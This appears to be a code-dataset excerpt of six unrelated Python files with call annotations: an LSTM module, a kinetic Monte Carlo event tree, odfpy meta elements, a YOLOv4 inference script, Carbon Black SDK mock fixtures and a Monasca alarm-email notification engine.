state_dict2 = dict([(name.replace('1', '0'), param.data) if isinstance(param, Parameter) else (name.replace('1', '0'), param)
for name, param in state_dict.items() if '1' in name])
self.rnn1.load_state_dict(state_dict1)
self.rnn2.load_state_dict(state_dict2)
for p in self.parameters(): p.requires_grad = False
self.output_size = 600
def setup_eval_embed(self, eval_embed, padding_idx=0):
self.eval_embed = nn.Embedding(eval_embed.size(0), eval_embed.size(1), padding_idx = padding_idx)
self.eval_embed.weight.data = eval_embed
for p in self.eval_embed.parameters():
p.requires_grad = False
def forward(self, x_idx, x_mask):
emb = self.embedding if self.training else self.eval_embed
x_hiddens = emb(x_idx)
lengths = x_mask.data.eq(0).long().sum(1)
lens, indices = torch.sort(lengths, 0, True)
output1, _ = self.rnn1(pack(x_hiddens[indices], lens.tolist(), batch_first=True))
output2, _ = self.rnn2(output1)
output1 = unpack(output1, batch_first=True)[0]
output2 = unpack(output2, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
output1 = output1[_indices]
output2 = output2[_indices]
return output1, output2
| [((74, 21, 74, 43), 'torch.load', 'torch.load', ({(74, 32, 74, 42): 'model_path'}, {}), '(model_path)', False, 'import torch\n'), ((75, 20, 75, 71), 'torch.nn.LSTM', 'nn.LSTM', (), '', True, 'import torch.nn as nn\n'), ((76, 20, 76, 71), 'torch.nn.LSTM', 'nn.LSTM', (), '', True, 'import torch.nn as nn\n'), ((94, 24, 94, 52), 'torch.sort', 'torch.sort', ({(94, 35, 94, 42): 'lengths', (94, 44, 94, 45): '0', (94, 47, 94, 51): 'True'}, {}), '(lengths, 0, True)', False, 'import torch\n'), ((100, 22, 100, 44), 'torch.sort', 'torch.sort', ({(100, 33, 100, 40): 'indices', (100, 42, 100, 43): '0'}, {}), '(indices, 0)', False, 'import torch\n'), ((111, 25, 111, 83), 'torch.nn.Embedding', 'nn.Embedding', (), '', True, 'import torch.nn as nn\n'), ((115, 21, 115, 37), 'torch.load', 'torch.load', ({(115, 32, 115, 36): 'path'}, {}), '(path)', False, 'import torch\n'), ((116, 20, 116, 71), 'torch.nn.LSTM', 'nn.LSTM', (), '', True, 'import torch.nn as nn\n'), ((117, 20, 117, 71), 'torch.nn.LSTM', 'nn.LSTM', (), '', True, 'import torch.nn as nn\n'), ((137, 24, 137, 52), 'torch.sort', 'torch.sort', ({(137, 35, 137, 42): 'lengths', (137, 44, 137, 45): '0', (137, 47, 137, 51): 'True'}, {}), '(lengths, 0, True)', False, 'import torch\n'), ((143, 22, 143, 44), 'torch.sort', 'torch.sort', ({(143, 33, 143, 40): 'indices', (143, 42, 143, 43): '0'}, {}), '(indices, 0)', False, 'import torch\n'), ((98, 18, 98, 51), 'torch.nn.utils.rnn.pad_packed_sequence', 'unpack', (), '', True, 'from torch.nn.utils.rnn import pad_packed_sequence as unpack\n'), ((99, 18, 99, 51), 'torch.nn.utils.rnn.pad_packed_sequence', 'unpack', (), '', True, 'from torch.nn.utils.rnn import pad_packed_sequence as unpack\n'), ((141, 18, 141, 51), 'torch.nn.utils.rnn.pad_packed_sequence', 'unpack', (), '', True, 'from torch.nn.utils.rnn import pad_packed_sequence as unpack\n'), ((142, 18, 142, 51), 'torch.nn.utils.rnn.pad_packed_sequence', 'unpack', (), '', True, 'from torch.nn.utils.rnn import pad_packed_sequence as unpack\n')] |
vlcekl/kmcpy | kmcsim/sim/events_old.py | b55a23f64d4b6d2871671f4a16346cc897c4a2a5 | #!//anaconda/envs/py36/bin/python
#
# File name: kmc_pld.py
# Date: 2018/08/03 09:07
# Author: Lukas Vlcek
#
# Description:
#
import numpy as np
from collections import Counter
class EventTree:
"""
Class maintaining a binary tree for random event type lookup
and arrays for choosing specific event.
"""
def __init__(self, rates, events):
self.rates = rates
self.events = events
self.__setup()
def __build_tree(self, e_ratio):
self.event_tree = []
# create event ratio array level 0 - bottom
if len(e_ratio) % 2 == 1:
e_ratio.extend([0.0])
# create the bottom level (rates*numbers)
self.event_tree.append(np.array(e_ratio))
# create partial summs (iteratively) up to the 2nd highest level
while len(e_ratio) > 2:
e_ratio = [e_ratio[i]+e_ratio[i+1] for i in range(0, len(e_ratio), 2)]
if len(e_ratio) % 2 == 1:
e_ratio.extend([0.0])
self.event_tree.append(np.array(e_ratio))
# create top level = sum of all rates
self.event_tree.append(np.array(sum(e_ratio)))
def __setup(self):
# Get dictionary of event type counts
e_counts = Counter([e['type'] for e in self.events])
print(e_counts)
# create a list of events based on event types
self.event_counts = [[] for _ in range(len(self.rates))]
for e in self.events:
self.event_counts[e['type']].append(e)
e_ratio = [e_counts.get(t, 0)*r for t, r in enumerate(self.rates)]
print('e_ratio', e_ratio)
self.__build_tree(e_ratio)
def update_events(self, old_events, new_events):
"""
Update tree: remove old events and add new events
"""
pass
def find_event(self):
"""Find and return an event"""
        # generate a random number in [0, total_rate); the top of the binary
        # tree holds the sum of all rates
        q = float(self.event_tree[-1])*np.random.random()
# cycle through levels (top->down)
# start with top-level child (k-2) end with level above bottom (1)
j = 0
for k in range(len(self.event_tree)-2, 0, -1):
# left child value
left = self.event_tree[k][j]
if q < left:
j = 2*j
else:
q -= left
j = 2*j + 1
# bottom level - return selected event type
if q < self.event_tree[0][j]:
            event_type = j
else:
            event_type = j + 1
# select a random event index of a given type
event_number = np.random.randint(len(self.event_counts[event_type]))
# get the event object
        event = self.event_counts[event_type][event_number]
return event
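# Usage sketch (assumed input format): rates are indexed by event type and each
# event dict carries a 'type' field, matching __setup() above.
#
#   rates = [1.0, 0.5]
#   events = [{'type': 0}, {'type': 0}, {'type': 1}]
#   tree = EventTree(rates, events)
#   chosen = tree.find_event()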
| [((52, 19, 52, 60), 'collections.Counter', 'Counter', ({(52, 27, 52, 59): "[e['type'] for e in self.events]"}, {}), "([e['type'] for e in self.events])", False, 'from collections import Counter\n'), ((35, 31, 35, 48), 'numpy.array', 'np.array', ({(35, 40, 35, 47): 'e_ratio'}, {}), '(e_ratio)', True, 'import numpy as np\n'), ((77, 20, 77, 38), 'numpy.random.random', 'np.random.random', ({}, {}), '()', True, 'import numpy as np\n'), ((43, 35, 43, 52), 'numpy.array', 'np.array', ({(43, 44, 43, 51): 'e_ratio'}, {}), '(e_ratio)', True, 'import numpy as np\n')] |
anthowen/duplify | env/lib/python3.6/site-packages/odf/meta.py | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | # -*- coding: utf-8 -*-
# Copyright (C) 2006-2007 Søren Roug, European Environment Agency
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contributor(s):
#
from odf.namespaces import METANS
from odf.element import Element
# Autogenerated
def AutoReload(**args):
return Element(qname = (METANS,'auto-reload'), **args)
def CreationDate(**args):
return Element(qname = (METANS,'creation-date'), **args)
def DateString(**args):
return Element(qname = (METANS,'date-string'), **args)
def DocumentStatistic(**args):
return Element(qname = (METANS,'document-statistic'), **args)
def EditingCycles(**args):
return Element(qname = (METANS,'editing-cycles'), **args)
def EditingDuration(**args):
return Element(qname = (METANS,'editing-duration'), **args)
def Generator(**args):
return Element(qname = (METANS,'generator'), **args)
def HyperlinkBehaviour(**args):
return Element(qname = (METANS,'hyperlink-behaviour'), **args)
def InitialCreator(**args):
return Element(qname = (METANS,'initial-creator'), **args)
def Keyword(**args):
return Element(qname = (METANS,'keyword'), **args)
def PrintDate(**args):
return Element(qname = (METANS,'print-date'), **args)
def PrintedBy(**args):
return Element(qname = (METANS,'printed-by'), **args)
def Template(**args):
args.setdefault('type', 'simple')
return Element(qname = (METANS,'template'), **args)
def UserDefined(**args):
return Element(qname = (METANS,'user-defined'), **args)
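# Usage sketch (assumed odfpy API): the factories return plain odf Elements that
# can be attached to a document's <office:meta> section.
#
#   from odf.opendocument import OpenDocumentText
#   doc = OpenDocumentText()
#   gen = Generator()
#   gen.addText("MyApp/1.0")
#   doc.meta.addElement(gen)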
| [((26, 11, 26, 58), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((29, 11, 29, 60), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((32, 11, 32, 58), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((35, 11, 35, 65), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((38, 11, 38, 61), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((41, 11, 41, 63), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((44, 11, 44, 56), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((47, 11, 47, 66), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((50, 11, 50, 62), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((53, 11, 53, 54), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((56, 11, 56, 57), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((59, 11, 59, 57), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((63, 11, 63, 55), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n'), ((66, 11, 66, 59), 'odf.element.Element', 'Element', (), '', False, 'from odf.element import Element\n')] |
Mr-TalhaIlyas/Scaled-YOLOv4 | scripts/my_inference.py | 2b0326a6bc1eba386eb1a78b56727dcf29c77bac | import os
os.environ['CUDA_VISIBLE_DEVICES'] = '2'
import torch
torch.rand(10)
import torch.nn as nn
import torch.nn.functional as F
import glob
from tqdm import tqdm, trange
print(torch.cuda.is_available())
print(torch.cuda.get_device_name())
print(torch.cuda.current_device())
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print('Using device:', device)
print()
#Additional Info when using cuda
if device.type == 'cuda':
print(torch.cuda.get_device_name(0))
print('Memory Usage:')
print('Allocated:', round(torch.cuda.memory_allocated(0)/1024**3,1), 'GB')
print('Cached: ', round(torch.cuda.memory_reserved(0)/1024**3,1), 'GB')
import torch.backends.cudnn as cudnn
import numpy as np
import os, cv2
from tqdm import tqdm, trange
import seaborn as sns
from models.experimental import attempt_load
from utils.datasets import LoadStreams, LoadImages
from utils.general import (
check_img_size, non_max_suppression, apply_classifier, scale_coords, xyxy2xywh, plot_one_box, strip_optimizer)
from utils.torch_utils import select_device, load_classifier, time_synchronized
from my_utils import xyxy_2_xyxyo, draw_boxes
# Initialize
device = select_device('')
half = device.type != 'cpu' # half precision only supported on CUDA
def prepare_input(img1, img_size=416, half=True):
img2 = cv2.resize(img1, (img_size, img_size)) # W x H
img2 = img2.transpose(2,0,1)
img2 = img2[np.newaxis, ...]
img2 = torch.from_numpy(img2).to(device) # torch image is ch x H x W
    img2 = img2.half() if half else img2.float()  # match the model's precision
img2 /= 255.0
return img2
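# Shape sketch (assumed input): prepare_input resizes an HxWx3 RGB image, reorders
# it to CxHxW, adds a batch axis and rescales to [0, 1].
#
#   dummy = np.zeros((720, 1280, 3), dtype=np.uint8)
#   batch = prepare_input(dummy, 416, half)   # torch.Size([1, 3, 416, 416])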
#%%
# Directories
out = '/home/user01/data_ssd/Talha/yolo/op/'
weights = '/home/user01/data_ssd/Talha/yolo/ScaledYOLOv4/runs/exp2_yolov4-csp-results/weights/best_yolov4-csp-results.pt'
source = '/home/user01/data_ssd/Talha/yolo/paprika_y5/valid/images/'
imgsz = 416
conf_thres = 0.4
iou_thres = 0.5
classes = [0,1,2,3,4,5]
class_names = ["blossom_end_rot", "graymold","powdery_mildew","spider_mite",
"spotting_disease", "snails_and_slugs"]
# deleting files in op_dir
filelist = [ f for f in os.listdir(out)]# if f.endswith(".png") ]
for f in tqdm(filelist, desc = 'Deleting old files fro directory'):
os.remove(os.path.join(out, f))
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size
if half:
model.half() # to FP16
img_paths = glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png') + \
glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg')
# Run inference
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
#%%
for i in trange(len(img_paths)):
path = img_paths[i]
img1 = cv2.imread(path)
img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB)
img_h, img_w, _ = img1.shape
img2 = prepare_input(img1, 416, half)
# get file name
name = os.path.basename(path)[:-4]
# Inference
t1 = time_synchronized()
pred = model(img2, augment=False)[0]
# Apply NMS
pred = non_max_suppression(pred, conf_thres, iou_thres, classes=classes, agnostic=True)
if pred[0] is not None:
boxes = pred[0].cpu().detach().numpy() # <xmin><ymin><xmax><ymax><confd><class_id>
else:
boxes = np.array([10.0, 20.0, 30.0, 50.0, 0.75, 0]).reshape(1,6) # dummy values
coords_minmax = np.zeros((boxes.shape[0], 4)) # droping 5th value
confd = np.zeros((boxes.shape[0], 1))
class_ids = np.zeros((boxes.shape[0], 1))
# assign
coords_minmax = boxes[:,0:4] # coords
confd = boxes[:,4] # confidence
class_ids = boxes[:,5] # class id
coords_xyminmax = []
det_classes = []
for i in range(boxes.shape[0]):
coords_xyminmax.append(xyxy_2_xyxyo(img_w, img_h, coords_minmax[i]))
det_classes.append(class_names[int(class_ids[i])])
all_bounding_boxnind = []
for i in range(boxes.shape[0]):
bounding_box = [0.0] * 6
bounding_box[0] = det_classes[i]
bounding_box[1] = confd[i]
bounding_box[2] = coords_xyminmax[i][0]
bounding_box[3] = coords_xyminmax[i][1]
bounding_box[4] = coords_xyminmax[i][2]
bounding_box[5] = coords_xyminmax[i][3]
bounding_box = str(bounding_box)[1:-1]# remove square brackets
bounding_box = bounding_box.replace("'",'')# removing inverted commas around class name
bounding_box = "".join(bounding_box.split())# remove spaces in between **here dont give space inbetween the inverted commas "".
all_bounding_boxnind.append(bounding_box)
all_bounding_boxnind = ' '.join(map(str, all_bounding_boxnind))# convert list to string
all_bounding_boxnind=list(all_bounding_boxnind.split(' ')) # convert strin to list
# replacing commas with spaces
for i in range(len(all_bounding_boxnind)):
all_bounding_boxnind[i] = all_bounding_boxnind[i].replace(',',' ')
for i in range(len(all_bounding_boxnind)):
# check if file exiscts else make new
with open(out +'{}.txt'.format(name), "a+") as file_object:
# Move read cursor to the start of file.
file_object.seek(0)
# If file is not empty then append '\n'
data = file_object.read(100)
if len(data) > 0 :
file_object.write("\n")
# Append text at the end of file
file_object.write(all_bounding_boxnind[i])
#%%
import glob, random
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rcParams['figure.dpi'] = 300
img_paths = glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png') + \
glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg')
img_path = random.choice(img_paths)
img1 = cv2.imread(img_path)
img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB)
img_h, img_w, _ = img1.shape
img2 = prepare_input(img1, 416, half)
pred = model(img2, augment=False)[0]
# Apply NMS
pred = non_max_suppression(pred, conf_thres, iou_thres, classes=classes, agnostic=True)
boxes = pred[0].cpu().detach().numpy() # <xmin><ymin><xmax><ymax><confd><class_id>
coords_minmax = np.zeros((boxes.shape[0], 4)) # droping 5th value
confd = np.zeros((boxes.shape[0], 1))
class_ids = np.zeros((boxes.shape[0], 1))
# assign
coords_minmax = boxes[:,0:4] # coords
confd = boxes[:,4] # confidence
class_ids = boxes[:,5] # class id
coords_xyminmax = []
det_classes = []
for i in range(boxes.shape[0]):
coords_xyminmax.append(xyxy_2_xyxyo(img_w, img_h, coords_minmax[i]))
det_classes.append(class_names[int(class_ids[i])])
t = np.asarray(coords_xyminmax)
op = draw_boxes(img1, confd, t, det_classes, class_names, order='xy_minmax', analysis=False)
plt.imshow(op)
print('='*50)
print('Image Name: ', os.path.basename(img_path),img1.shape)
print('\nClass_name ', '| B_box Coords ', '| Confidence')
print('_'*50)
for k in range(len(det_classes)):
print(det_classes[k], t[k], confd[k])
print('='*50) | [...]
fslds/carbon-black-cloud-sdk-python | src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py | 248a3c63d6b36d6fcdbcb3f51fb7751f062ed372 | """Mock responses for recommendations."""
SEARCH_REQ = {
"criteria": {
"policy_type": ['reputation_override'],
"status": ['NEW', 'REJECTED', 'ACCEPTED'],
"hashes": ['111', '222']
},
"rows": 50,
"sort": [
{
"field": "impact_score",
"order": "DESC"
}
]
}
SEARCH_RESP = {
"results": [
{
"recommendation_id": "91e9158f-23cc-47fd-af7f-8f56e2206523",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "32d2be78c00056b577295aa0943d97a5c5a0be357183fcd714c7f5036e4bdede",
"filename": "XprotectService",
"application": {
"type": "EXE",
"value": "FOO"
}
},
"workflow": {
"status": "NEW",
"changed_by": "[email protected]",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T20:53:39.000Z",
"comment": "Ours is the fury"
},
"impact": {
"org_adoption": "LOW",
"impacted_devices": 45,
"event_count": 76,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
},
{
"recommendation_id": "bd50c2b2-5403-4e9e-8863-9991f70df026",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "0bbc082cd8b3ff62898ad80a57cb5e1f379e3fcfa48fa2f9858901eb0c220dc0",
"filename": "sophos ui.msi"
},
"workflow": {
"status": "NEW",
"changed_by": "[email protected]",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T20:53:09.000Z",
"comment": "Always pay your debts"
},
"impact": {
"org_adoption": "HIGH",
"impacted_devices": 8,
"event_count": 25,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
},
{
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "NEW",
"changed_by": "[email protected]",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
],
"num_found": 3
}
ACTION_INIT = {
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "NEW",
"changed_by": "[email protected]",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
ACTION_REQS = [
{
"action": "ACCEPT",
"comment": "Alpha"
},
{
"action": "RESET"
},
{
"action": "REJECT",
"comment": "Charlie"
},
]
ACTION_REFRESH_SEARCH = {
"criteria": {
"status": ['NEW', 'REJECTED', 'ACCEPTED'],
"policy_type": ['reputation_override']
},
"rows": 50
}
ACTION_SEARCH_RESP = {
"results": [ACTION_INIT],
"num_found": 1
}
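# Workflow statuses expected after each entry in ACTION_REQS is applied, in the
# same order (ACCEPT -> ACCEPTED, RESET -> NEW, REJECT -> REJECTED).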
ACTION_REFRESH_STATUS = ['ACCEPTED', 'NEW', 'REJECTED']
ACTION_INIT_ACCEPTED = {
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "ACCEPTED",
"ref_id": "e9410b754ea011ebbfd0db2585a41b07",
"changed_by": "[email protected]",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
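
# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original fixture set): a test module
# importing these fixtures could sanity-check their internal consistency
# before wiring them into mocked API responses. Only names defined above are
# used; no SDK API is assumed.
#
#     assert SEARCH_RESP["num_found"] == len(SEARCH_RESP["results"])
#     assert ACTION_SEARCH_RESP["num_found"] == len(ACTION_SEARCH_RESP["results"])
#     assert len(ACTION_REQS) == len(ACTION_REFRESH_STATUS)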
| [] |
TeamZenith/python-monasca | monasca/microservice/notification_engine.py | badc86fbe2c4424deb15b84eabd3248e899ef4ee | # Copyright 2015 Carnegie Mellon University
#
# Author: Han Chen <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import json
from oslo.config import cfg
from stevedore import driver
from monasca.common import es_conn
from monasca.common import email_sender
from monasca.common import kafka_conn
from monasca.openstack.common import log
from monasca.openstack.common import service as os_service
es_opts = [
cfg.StrOpt('topic',
default='alarm',
help=('The topic that messages will be retrieved from.'
'This also will be used as a doc type when saved '
'to ElasticSearch.')),
cfg.StrOpt('topic2',
default='notification_methods',
help=('The topic that messages will be retrieved from.'
'This also will be used as a doc type when saved '
'to ElasticSearch.')),
cfg.StrOpt('doc_type',
default='',
help=('The document type which defines what document '
'type the messages will be save into. If not '
'specified, then the topic will be used.')),
cfg.StrOpt('processor',
default='',
help=('The message processer to load to process the message.'
'If the message does not need to be process anyway,'
'leave the default')),
]
es_group = cfg.OptGroup(name='notification', title='notification')
cfg.CONF.register_group(es_group)
cfg.CONF.register_opts(es_opts, es_group)
LOG = log.getLogger(__name__)
class NotificationEngine(os_service.Service):
def __init__(self, threads=1000):
super(NotificationEngine, self).__init__(threads)
self._kafka_conn = kafka_conn.KafkaConnection(
cfg.CONF.notification.topic)
# Use doc_type if it is defined.
if cfg.CONF.notification.doc_type:
self._es_conn = es_conn.ESConnection(
cfg.CONF.notification.doc_type)
else:
self._es_conn = es_conn.ESConnection(
cfg.CONF.notification.topic2)
def handle_alarm_msg(self, msg):
if msg and msg.message:
LOG.debug("Message received for alarm: " + msg.message.value)
value = msg.message.value
if value:
# value's format is:
# {
# "metrics": {
# "timestamp": 1432672915.409,
# "name": "biz",
# "value": 1500,
# "dimensions": {
# "key2": "value2",
# "key1": "value1"
# }
# },
# "state_updated_timestamp": 1432672915,
# "state": "ALARM",
# "alarm-definition": {
# "alarm_actions": [
# "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
# ],
# "undetermined_actions": [
# "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
# ],
# "name": "Average CPU percent greater than 10",
# "match_by": [
# "hostname"
# ],
# "description": "The average CPU percent is greater than 10",
# "ok_actions": [
# "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
# ],
# "expression": "max(foo{hostname=mini-mon,mu=na}, 120) > 1100
# and max(bar { asd = asd} )>1200 or avg(biz)>1300",
# "id": "c60ec47e-5038-4bf1-9f95-4046c6e91111",
# "severity": "LOW"
# }
# }
                # Convert the value to a dict and read its state to determine
                # which actions (notification method ids) apply. Each method id
                # is matched against the notification methods stored in
                # ElasticSearch, and an email is sent to the resolved addresses.
                # (TODO: phone/text-message notifications are not handled yet.)
dict_msg = ast.literal_eval(value)
state = dict_msg["state"]
if state not in ["ALARM","OK","UNDETERMINED"]:
LOG.error("state of alarm is not defined as expected")
return
actions = []
if state == 'ALARM':
actions = dict_msg["alarm-definition"]["alarm_actions"]
if state == 'OK':
actions = dict_msg["alarm-definition"]["ok_actions"]
if state == 'UNDETERMINED':
actions = dict_msg["alarm-definition"]["undetermined_actions"]
addresses = []
types = []
                # Each action_id is the id of a notification method; a single
                # alarm message can carry multiple ids of different types.
for action_id in actions:
es_res = self._es_conn.get_message_by_id(action_id)
def _get_notification_method_response(res):
if res and res.status_code == 200:
obj = res.json()
if obj:
return obj.get('hits')
return None
else:
return None
es_res = _get_notification_method_response(es_res)
LOG.debug('Query to ElasticSearch returned: %s' % es_res)
if es_res is None:
LOG.error("The provided is not defined as expected")
return
name = es_res["hits"][0]["_source"]["name"]
type = es_res["hits"][0]["_source"]["type"]
address = es_res["hits"][0]["_source"]["address"]
types.append(type)
addresses.append(address)
                email_addresses = []
                for ntype, address in zip(types, addresses):
                    if ntype == "EMAIL":
                        email_addresses.append(address)
email_sender.send_emails(email_addresses, "Alarm to User", dict_msg["alarm-definition"]["description"])
def start(self):
while True:
try:
for msg in self._kafka_conn.get_messages():
self.handle_alarm_msg(msg)
# if autocommit is set, this will be a no-op call.
self._kafka_conn.commit()
except Exception:
LOG.exception('Error occurred while handling kafka messages.')
def stop(self):
self._kafka_conn.close()
super(NotificationEngine, self).stop()
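
# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): handle_alarm_msg()
# can be exercised without Kafka or ElasticSearch by stubbing both connections
# with mock objects. The alarm payload follows the format documented inside
# handle_alarm_msg(); the ElasticSearch document shape is an assumption that
# matches what the method reads back. Kept commented out so the behaviour of
# the service module itself is unchanged; note that email_sender.send_emails()
# would still be invoked for real at the end of the call.
#
#     import mock  # or `from unittest import mock` on Python 3
#
#     engine = NotificationEngine.__new__(NotificationEngine)  # skip __init__
#     es_payload = {'hits': {'hits': [{'_source': {
#         'name': 'ops-email', 'type': 'EMAIL',
#         'address': '[email protected]'}}]}}
#     engine._es_conn = mock.Mock()
#     engine._es_conn.get_message_by_id.return_value = mock.Mock(
#         status_code=200, json=lambda: es_payload)
#
#     alarm = {'state': 'ALARM',
#              'alarm-definition': {'alarm_actions': ['abc-123'],
#                                   'ok_actions': [],
#                                   'undetermined_actions': [],
#                                   'description': 'CPU is too high'}}
#     fake_msg = mock.Mock()
#     fake_msg.message.value = str(alarm)
#     engine.handle_alarm_msg(fake_msg)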
| [((53, 11, 53, 66), 'oslo.config.cfg.OptGroup', 'cfg.OptGroup', (), '', False, 'from oslo.config import cfg\n'), ((54, 0, 54, 33), 'oslo.config.cfg.CONF.register_group', 'cfg.CONF.register_group', ({(54, 24, 54, 32): 'es_group'}, {}), '(es_group)', False, 'from oslo.config import cfg\n'), ((55, 0, 55, 41), 'oslo.config.cfg.CONF.register_opts', 'cfg.CONF.register_opts', ({(55, 23, 55, 30): 'es_opts', (55, 32, 55, 40): 'es_group'}, {}), '(es_opts, es_group)', False, 'from oslo.config import cfg\n'), ((57, 6, 57, 29), 'monasca.openstack.common.log.getLogger', 'log.getLogger', ({(57, 20, 57, 28): '__name__'}, {}), '(__name__)', False, 'from monasca.openstack.common import log\n'), ((29, 4, 33, 42), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((35, 4, 39, 42), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((41, 4, 45, 64), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((46, 4, 50, 42), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((63, 27, 64, 40), 'monasca.common.kafka_conn.KafkaConnection', 'kafka_conn.KafkaConnection', ({(64, 12, 64, 39): 'cfg.CONF.notification.topic'}, {}), '(cfg.CONF.notification.topic)', False, 'from monasca.common import kafka_conn\n'), ((68, 28, 69, 47), 'monasca.common.es_conn.ESConnection', 'es_conn.ESConnection', ({(69, 16, 69, 46): 'cfg.CONF.notification.doc_type'}, {}), '(cfg.CONF.notification.doc_type)', False, 'from monasca.common import es_conn\n'), ((71, 28, 72, 45), 'monasca.common.es_conn.ESConnection', 'es_conn.ESConnection', ({(72, 16, 72, 44): 'cfg.CONF.notification.topic2'}, {}), '(cfg.CONF.notification.topic2)', False, 'from monasca.common import es_conn\n'), ((117, 27, 117, 50), 'ast.literal_eval', 'ast.literal_eval', ({(117, 44, 117, 49): 'value'}, {}), '(value)', False, 'import ast\n'), ((168, 16, 168, 119), 'monasca.common.email_sender.send_emails', 'email_sender.send_emails', ({(168, 41, 168, 56): 'email_addresses', (168, 58, 168, 73): '"""Alarm to User"""', (168, 75, 168, 118): "dict_msg['alarm-definition']['description']"}, {}), "(email_addresses, 'Alarm to User', dict_msg[\n 'alarm-definition']['description'])", False, 'from monasca.common import email_sender\n')] |